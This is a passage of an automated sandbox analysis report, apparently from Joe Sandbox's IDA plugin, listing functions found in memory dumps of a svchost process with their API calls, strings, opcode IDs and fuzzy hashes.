                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 2C015771B04A4087EA10DB12A89C35A62A9F789FD4F488134DE8A53758DF3CC98AC781
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: 6ed2c90be072456ea9a4bd697f2fd10eb4d467ec23d608173af05e33368ab2c7
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: F1111B25B01B4087EB25DB22E80D71977E8AB4AF55F080425C94F67764EF3DC64CC702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: ec1b6f25bef38d2063cdb20bcb1da5f9fd383d8b2700952db0105f78bebcc860
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: 29F08C7274468093EB20DB25E89C39973B4F789F99F888020DA4A57968DF7CC68DCB01
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: acbe1909f79230598a35ed9adc7c1bbb906d6631c637f76bf5b0bf99aec116dd
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 9DF05820B04B8093EA10DB13F94D1997668AB4AFE1F0C81319E9B27B28CF2CC49A8301
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: 07c1bbe4bd8fa36892a6acb05d92240b6e010a04fd6df588d3c163491b032429
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: 8CF05861B21A0083FB449F60F88D36837A8AB8AF51F4C2429940B67660CF2CC48CC702
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: df798411ffdd1e079f6ec0f7e0163927004e3dd69baf84aa45194ce4d626a18f
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: DB02EB32619B8487EB60CB55F49835AB7E4F3C6B91F141015EA8E97BA8DF7CC488CB41
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 000002A6613109C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002A66131093F,?,?,?,000002A66130E263), ref: 000002A661310A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002A66131093F,?,?,?,000002A66130E263), ref: 000002A661310B0A
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: a7c031cb47e0da5df3db95bfe4ff753df23f7a458a82281f936f31c8550ff9fb
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: B081CD22F106508BFB109F21888E3AD36A8F346F98F488115DE0BB7A95DF3CC469C712
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction ID: 1477b44af3bc5b2e11128b243148cabb83ef55db588efe9a889fe495fa95e10e
                                                        • Opcode Fuzzy Hash: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction Fuzzy Hash: 6A61C832A18B8487EB60DB15E44C31A77E4F38AB45F145216EA8E97BA8DF7CC548CF41
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: d0be51bb97c77e0ad5bdb36d0dfb571661a8787d0f5a0318a365b3a9312d08c6
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 87114F62F50A9103F7541334E45E3A5107DEB96F64F1C4634AA760B7D6AF2C8BC94103
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 5d0b80dcd1d52c1e52f0ea186871689deea632be76c95cad4b0f4eefd2fb3a69
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 13115122F50A4107F7581634E65F366704AAB57B74F3C4724AE773B3D68F1C8889C106
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: a993612211386aae288452f10f62fbca7a8037bf902ba64a4ade7fa5b27061ce
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 0E115B2AB04B4087EF14DB26E44D66A76A8F78AF95F080029DE8E57794EF3DC64CC741
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: f4eb0129fd14240ef0102f3e0811ff151b87a391b843d24c61ac8060cb080afb
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 29119325B04B8097FB10D725EC4D79A67E8F786B91F4840219E4EA3794EF2DC90DC782
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: 1daf3469cd6de168c41f071deeb24fc07ab5ba2376be75abb320c7fbf3975a19
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: 04014832A00A90C7E704EFA6E80D24977B4FB8AF94F084435EA4A63728DF38C059C741
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: df8aa83f03d2fd4b7502ab1c9e283bf49b84e0899f070c7dc1244de843f897e2
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 8C71A436B0078147EB65DE36994C7AA6BE8F38AF85F480015ED4B63B95DF38C6098781
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 870dcabaa3d7d3f9cd9dc2d94d530f91ef4db72a297b243bfe3d14b4eac83292
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: FE616D22F00A4883FBA89B29D55C36D6AACEF42F50F1C4415DA4A177E5DF7CC9C98A12
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: abdb4a8d6153689e566b0b83c39c78e2385abbb7c75edc36dd3933eac7855ee4
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: D2519822B0438183E674DE35A56C3AAA7E9F386B81F480015DE4B23B59DF3EC50C97C5
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: 444756d706f330fdcf8bd50708be853e2a46aed5e08064c78c4eb5f749973874
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: E941E232B14B4482EB20DF25E84D3AA77A4F789B94F494021EE8E97788DF3CC459CB41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 60d1c5e23022e7c7b18395f28c59f8c027c170bd43f4b64b0faf1f76f73bcbdd
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: 36111D36B08B8086D760CB15F44839AB7A9F7C9BD4F584126EE8E53B59CF3CC5548B40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 9142d0e90a15875c23e2ef622068383e6720854bda89ff63b14601dbed6587ad
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 52110D32614B4482EB118F15E848359B7E9F789FA4F1C4221DE8D17754DF3DC555CB41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: c3e01dfff161a5976bd281dc4611083f0f7a3eb579575d7db59aa67312c1ec9c
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: 96F08225B04B8083EB149B51F44D69976A8AB4AF90F4C9129E90B23B95CF3CC44DC742
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 000002A66130D751
                                                        • TlsSetValue.KERNEL32(?,?,?,000002A66130B50E,?,?,?,000002A66130B969,?,?,?,?,000002A66130BA1D), ref: 000002A66130D768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 99ba0b0960493b7701356cd3252ef2e8c1eec5ecfecca4cb90bae358581854c4
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: 35E06565B0054093EA445B50F54D2D832A9A74AF85F5C8025E507273D5DF3CC44DC242
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
